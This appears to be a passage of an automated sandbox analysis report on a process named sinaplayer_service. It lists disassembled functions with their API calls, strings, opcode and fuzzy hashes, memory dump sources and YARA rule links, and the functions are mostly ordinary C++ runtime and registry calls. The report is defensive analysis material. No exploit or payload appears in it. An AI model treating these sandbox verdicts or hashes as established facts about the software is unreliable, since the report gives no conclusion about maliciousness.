                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dunscale$__fperrraise_errno_fdtestfesetexceptflag
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3384718034-0
                                                                                                                                                                                                    • Opcode ID: 578d7de81530eb6dbbf3bb663a7250ec85a354cc6767498e3e974f4b99c5c6b3
                                                                                                                                                                                                    • Instruction ID: 877f1b5c605b5413d18fbcaab148be8602e532ebfb4b86101442e750da4fd1a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 578d7de81530eb6dbbf3bb663a7250ec85a354cc6767498e3e974f4b99c5c6b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45912BB160910AEFCF00AF58C9856FE7BB4FF82352F614589E591A7E80E7348665CB4C
                                                                                                                                                                                                    Function 00375490 Relevance: 18.2, APIs: 12, Instructions: 204COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: fd999dceb572c75719a5396b210085305710d75415562c2209fb1ef112bddb38
                                                                                                                                                                                                    • Instruction ID: dd0483614198b12b94cbfed22f8fc39f73558dbb393e3d92dffa7a1c1d23d009
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd999dceb572c75719a5396b210085305710d75415562c2209fb1ef112bddb38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65712C75600B048FCB2ACF29D58455AB7F6FF8A320B518A5ED84B8BB60D775F805CB50
                                                                                                                                                                                                    Function 6C572FC3 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • atol.MSVCR120(00000001,00000001,00000010,FFFFFEFF,?,00000000), ref: 6C5AD947
                                                                                                                                                                                                    • DName::operator=.LIBCMT ref: 6C5AD95D
                                                                                                                                                                                                    • DName::operator=.LIBCMT ref: 6C5AD96C
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6C5AD97F
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6C5AD986
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator=$NameName::Name::operator+atol
                                                                                                                                                                                                    • String ID: generic-type-$template-parameter-
                                                                                                                                                                                                    • API String ID: 1861674852-13229604
                                                                                                                                                                                                    • Opcode ID: 3929d9c322ba885f141bf18c74961df2cf6530a42ba14709de64393fcc9d63d0
                                                                                                                                                                                                    • Instruction ID: 03f01ee0e7b632024d281afbdb9ac6f09aa9b4170c551d5f971d354d86b16ed7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3929d9c322ba885f141bf18c74961df2cf6530a42ba14709de64393fcc9d63d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C61AE71E01209EFDF14DFA5DC84AEDB7F8AB59314F10441AE815A7640EB349A49CB68
                                                                                                                                                                                                    Function 00381110 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00381156
                                                                                                                                                                                                    • ??0RegKey@win@base@@QAE@XZ.BASE ref: 0038117A
                                                                                                                                                                                                    • ?Open@RegKey@win@base@@QAEJPAUHKEY__@@PB_WK@Z.BASE(80000001,Software\Sina\Player\ClientCode,000F003F), ref: 0038119C
                                                                                                                                                                                                    • memset.MSVCR120 ref: 003811B7
                                                                                                                                                                                                    • ?ReadValue@RegKey@win@base@@QBEJPB_WPAXPAK2@Z.BASE(00000000,?,00000208,00000001), ref: 003811DC
                                                                                                                                                                                                    • ?WriteValue@RegKey@win@base@@QAEJPB_WPBXKK@Z.BASE(00000000,003819F5,0039D5F4,00000001), ref: 0038124E
                                                                                                                                                                                                    • ?Create@RegKey@win@base@@QAEJPAUHKEY__@@PB_WK@Z.BASE(80000001,Software\Sina\Player\ClientCode,000F003F), ref: 00381286
                                                                                                                                                                                                    • ?WriteValue@RegKey@win@base@@QAEJPB_WPBXKK@Z.BASE(00000000,003819F5,0039D5F4,00000001), ref: 003812AD
                                                                                                                                                                                                    • ??1RegKey@win@base@@QAE@XZ.BASE ref: 003812C0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Key@win@base@@$Value@$WriteY__@@memset$Create@Open@Read
                                                                                                                                                                                                    • String ID: Software\Sina\Player\ClientCode
                                                                                                                                                                                                    • API String ID: 1512995821-62322717
                                                                                                                                                                                                    • Opcode ID: 0a17b4e095dc784f147a6228e0fd22de1bb53265edee42271cec2929fb3bfe77
                                                                                                                                                                                                    • Instruction ID: 003894313386496f7f0e65d0174a37f451241bcc6e6d98fa7fa676a67828405f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a17b4e095dc784f147a6228e0fd22de1bb53265edee42271cec2929fb3bfe77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC516471A40318ABDF22EF54DD49BE6B7BCFB24710F500699E906E7280E731AA85CF50
                                                                                                                                                                                                    Function 00371B30 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long), ref: 00371B71
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?), ref: 00371BA4
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 00371BB5
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,?,?), ref: 00371BCB
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?), ref: 00371BDB
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,?,?,?,?,?), ref: 00371BED
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120 ref: 00371C03
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00371C0D
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?), ref: 00371C30
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memmove$??2@??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 1887487913-3788999226
                                                                                                                                                                                                    • Opcode ID: ed0213c7c7fc45b6f73447a2e846c9686330561d7e3d0fef70f3f3934ffd5b11
                                                                                                                                                                                                    • Instruction ID: 94f5a656c86894d4a0d188a2b907f0710a83373114cd06b8637bfa28508bbd74
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed0213c7c7fc45b6f73447a2e846c9686330561d7e3d0fef70f3f3934ffd5b11
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F41D5B6A002059FCB39DF7CDD8596E77A9EF84310B24867DE85AD3340EA71ED008A90
                                                                                                                                                                                                    Function 00379F20 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,?,?), ref: 00379F5C
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F7,?), ref: 00379F72
                                                                                                                                                                                                    • ?CreateFileVersionInfo@FileVersionInfo@@SAPAV1@ABVFilePath@base@@@Z.BASE(?), ref: 00379F87
                                                                                                                                                                                                    • ?SysWideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,00000000), ref: 00379FB1
                                                                                                                                                                                                      • Part of subcall function 00372760: ??3@YAXPAX@Z.MSVCR120(?), ref: 00372773
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379FCF
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379FF2
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A014
                                                                                                                                                                                                    • ?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(?,?,?), ref: 0037A05A
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A073
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • AFFD64EB-27A5-4488-858D-6AC989A56887, xrefs: 0037A098
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$??3@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$Path@base@@Path@base@@@Version$Base64BasicCreateD@2@@std@@D@2@@std@@@D@2@@std@@@1@Encode@base@@F8@base@@Get@Info@Info@@PathPiece@Service@@StringU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@3@@W@std@@Wide
                                                                                                                                                                                                    • String ID: AFFD64EB-27A5-4488-858D-6AC989A56887
                                                                                                                                                                                                    • API String ID: 1789109476-1517175651
                                                                                                                                                                                                    • Opcode ID: 7b03b5b591af2c43d0d71f269825af1218452fbaed5fffae6f80b88939adb9b7
                                                                                                                                                                                                    • Instruction ID: 954dcf217cf6f86eaf790b0e77205055f636e8908eba4bb6d3c49b9010420aa7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b03b5b591af2c43d0d71f269825af1218452fbaed5fffae6f80b88939adb9b7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7451D471D00209DFDF26DFA4C909BEEBBB8FF05314F004169E41AA7280D7395A44CBA2
                                                                                                                                                                                                    Function 6C574F0C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000001), ref: 6C5779E7
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(px[l), ref: 6C5A291E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,Function_000DCEE8,px[l), ref: 6C5A2933
                                                                                                                                                                                                      • Part of subcall function 6C574EB3: __EH_prolog3.LIBCMT ref: 6C574EBA
                                                                                                                                                                                                      • Part of subcall function 6C574EB3: ??2@YAPAXI@Z.MSVCR120(000000D0), ref: 6C574ED9
                                                                                                                                                                                                      • Part of subcall function 6C574EB3: free.MSVCR120(00000000), ref: 6C574EFC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@CriticalExceptionH_prolog3LeaveSectionThrowfreestd::exception::exception
                                                                                                                                                                                                    • String ID: pScheduler$px[l
                                                                                                                                                                                                    • API String ID: 2663953338-1422803105
                                                                                                                                                                                                    • Opcode ID: e15071452756b89519f068b73959255ea71326715932f74211d4de82100a773b
                                                                                                                                                                                                    • Instruction ID: 5fa220628e530475ab04d24645d2cbabcf1baa0dc7bd5b19ff287446bf58a355
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e15071452756b89519f068b73959255ea71326715932f74211d4de82100a773b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81419D70601209EFCB15CF67CC86AADBBB4FF05348F10852AE8199BA50D730E995CFA5
                                                                                                                                                                                                    Function 0038A294 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0038D2F0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,00389D69,?), ref: 0038D300
                                                                                                                                                                                                      • Part of subcall function 0038D2F0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,00389D69,?), ref: 0038D325
                                                                                                                                                                                                      • Part of subcall function 0038D2F0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,00389D69,?), ref: 0038D342
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 0038A2A3
                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB), ref: 0038A2DD
                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP120 ref: 0038A2F8
                                                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120 ref: 0038A31E
                                                                                                                                                                                                    • ?_Getcat@?$codecvt@_WDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,?), ref: 0038A33F
                                                                                                                                                                                                    • ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast), ref: 0038A355
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 0038A364
                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0038A37A
                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP120 ref: 0038A385
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$ExceptionLockit@std@@Throw$??0_??0bad_cast@std@@??1_Bid@locale@std@@Facet_Getcat@?$codecvt@_Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 3850036058-3145022300
                                                                                                                                                                                                    • Opcode ID: 051b82ad9f8a489f1404f1fe3a7d0d7a2b6776dafd2fa271d49a0ec46f7a9aa5
                                                                                                                                                                                                    • Instruction ID: 24546758646445f4499c198847f49969630d693975bf94a015198508bc03f12a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 051b82ad9f8a489f1404f1fe3a7d0d7a2b6776dafd2fa271d49a0ec46f7a9aa5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0531BF76A00614DFDB12EFA4DC49BAEB7B8FF09720F054596E811A73A1D771AD00CB92
                                                                                                                                                                                                    Function 00387220 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90windowfileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00380711,?,00000000,8285FFAB,?,00000001), ref: 0038725F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0038726D
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 0038729C
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,00000076,00000001), ref: 003872B6
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,00000026), ref: 003872E1
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,00000026), ref: 003872F9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message@logging@@$??6?$basic_ostream@D@std@@@std@@ErrorFileLastLevel@logging@@ReadU?$char_traits@V01@
                                                                                                                                                                                                    • String ID: &$ReadFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 493541695-1956146570
                                                                                                                                                                                                    • Opcode ID: 5660fa04ef609c8953754b9dc47e9302bb5da36bef9d0f91058693053d0732ba
                                                                                                                                                                                                    • Instruction ID: 81ef397f4a1b296abccf10c7ee19cba4c5fe7a75a34c04a279d6a42d669dcc7a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5660fa04ef609c8953754b9dc47e9302bb5da36bef9d0f91058693053d0732ba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61317172E04208AFDB25DF94DD46BEEB7B8FB08750F10456BF915E2280E7369A048B50
                                                                                                                                                                                                    Function 6C580B56 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: operator+
                                                                                                                                                                                                    • String ID: cli::array<$cli::pin_ptr<$void$void
                                                                                                                                                                                                    • API String ID: 3839230940-456688812
                                                                                                                                                                                                    • Opcode ID: d84be39d48f35dd978944af32555e630100b124d6fe5b5b7f1a9403822c7bfbf
                                                                                                                                                                                                    • Instruction ID: 8b267c698d86252db60cc1867654f9706106cd861b621a82dc16329bdfbee1af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d84be39d48f35dd978944af32555e630100b124d6fe5b5b7f1a9403822c7bfbf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A219F31906259EFDF10DF94CC80FEE3BB9EB85359F108456F9189BA50E731A985CB90
                                                                                                                                                                                                    Function 6C576951 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C576958
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000028,0000002C,6C5769D2,?,00000000,?,?,?,6C573D6E,6C5648CA,00000000,0000000C,6C573E4B,?,00000000,?), ref: 6C576961
                                                                                                                                                                                                      • Part of subcall function 6C55EE11: malloc.MSVCR120(?), ref: 6C55EE1A
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,6C630674,00000028,0000002C,6C5769D2,?,00000000,?,?,?,6C573D6E,6C5648CA,00000000,0000000C,6C573E4B,?), ref: 6C57697B
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001), ref: 6C576990
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000001), ref: 6C57699B
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6C5A336F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C5B76B4,6C62D0A4), ref: 6C5A3384
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,6C5B76B4,6C62D0A4), ref: 6C5A33A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
                                                                                                                                                                                                    • String ID: tv[l
                                                                                                                                                                                                    • API String ID: 1089537546-2284738009
                                                                                                                                                                                                    • Opcode ID: b12211437349963379821e884bffe94ba372fda4b853a3c331940777ba9eaf5a
                                                                                                                                                                                                    • Instruction ID: 48db2408bdba585bb2d6d1bf8212c5f126665607bc2bbde34cc4e1e7aa7cc52f
